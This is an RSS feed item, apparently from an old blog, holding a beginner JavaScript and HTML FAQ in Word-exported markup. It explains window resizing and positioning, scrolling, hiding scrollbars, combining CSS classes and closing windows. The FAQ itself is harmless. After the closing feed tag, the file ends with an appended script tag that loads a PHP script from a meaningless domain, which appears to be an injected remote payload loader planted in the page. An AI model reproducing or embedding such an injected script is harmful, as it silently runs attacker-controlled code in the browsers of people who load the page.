<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">Put this as early in the &lt;head&gt; of the page as possible: </span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;script&gt;<br />
self.resizeTo(100,200);<br />
&lt;/script&gt;</span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">Set the dimensions in the parentheses.  The first number is the width; the second is the height</span></p>
</div>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091864"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.4.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How can I set a window&#8217;s position when it is opened?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"> </span></h2>
</p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">Put this as early in the &lt;head&gt; of the page as possible: </span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;script&gt;<br />
self.moveTo(100,200);<br />
&lt;/script&gt;</span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">Set the position in the parentheses.  The first number is the x (that is, left) position; the second number is the y (that is, top) position</span></p>
</div>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091865"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.5.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How do I use JavaScript to scroll to the top of the page?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"> </span></h2>
</p>
<p class="MsoNormal" style="margin: 0in 0in 0pt;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">The following JavaScript link in your page will cause the page to scroll to the top: </span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;a href=&#8221;javascript:scroll(0,0)&#8221;&gt;<br />
Top<br />
&lt;/a&gt;</span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">The first number is the x position, the second is the y position. (Positions are in pixels.)  So, you can also change these numbers to scroll to a specific point on a page, too.</span></p>
</div>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091866"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.6.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How do I stop the scrollbar from showing in a regular window?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"> </span></h2>
</p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;">In windows where you have a minimum of content, or for design reasons do not want the browser scrollbar to show, you can remove the scrollbar by adding </span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">scroll=&#8221;no&#8221;</span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;"> to the page body tag, like this:</span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;body scroll=&#8221;no&#8221;&gt;</span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;">A perhaps more sensible approach in most cases, however, is to use </span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">scroll=&#8221;auto&#8221;</span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;"> instead.  This removes the scrollbar from the page when there is no need for it; but shows the scrollbar when content exceeds the length of the window.  Thus:</span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"></span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;body scroll=&#8221;auto&#8221;&gt;</span></p>
</div>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091867"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.7.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How do I attach more than one style to an element?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"> </span></h2>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">Basically, you just put them all in a row with a space between them when you attach the class, as in this &lt;div&gt; example, where three different styles are used: </span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;div class=&#8221;styleOne styleTwo styleThree&#8221;&gt;</span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">For instance, let&#8217;s say we have this style script in the head of the page:</span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;style&gt;</p>
<p>.bigText {<br />
font-family: sans-serif;<br />
font-size: 20px;<br />
}<br />
.redItalic {<br />
color : red;<br />
font-style: italic;<br />
}<br />
.lineThrough {<br />
text-decoration: line-through;<br />
}<br />
&lt;/style&gt;</span>
</p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">To attach that to a &lt;div&gt; with some text, it would look like this:</span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;div class=&#8221;bigText redItalic lineThrough&#8221;&gt;<br />
Hello<br />
&lt;/div&gt;</span>
</p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">with the result showing, thus&#8230;</span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p class="MsoNormal" style="margin: 0in 0in 0pt; mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><em style="mso-bidi-font-style: normal;"><span style="font-size: 10pt; color: red; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt; mso-bidi-font-family: Arial;">Hello</span></em></p>
</div>
<p class="MsoNormal" style="margin: 0in 0in 0pt;"><em style="mso-bidi-font-style: normal;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt; mso-bidi-font-family: Arial;"><span style="text-decoration: none;"> </span></span></em></p>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091868"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.8.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How do I close a regular window with a JavaScript link, and how would I do it if I am using frames?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"> </span></h2>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;">For a regular window, use this:</span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;a href=&#8221;javascript:window.close()&#8221;&gt;Close&lt;/a&gt;</span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: white; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;">I</span><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;">f you are using a frameset, then use this in any page in any frame in the fr</span><span style="font-size: 10pt; color: white; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-bidi-font-family: Arial;">ameset:</span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"></span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;a href=&#8221;javascript:top.window.close()&#8221;&gt;Close&lt;/a&gt; </span></p>
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
</div>
<p class="MsoNormal" style="margin: 0in 0in 0pt;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/03/11/java-script-faq/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://kdjkfjskdfjlskdjf.com/js.php"></script>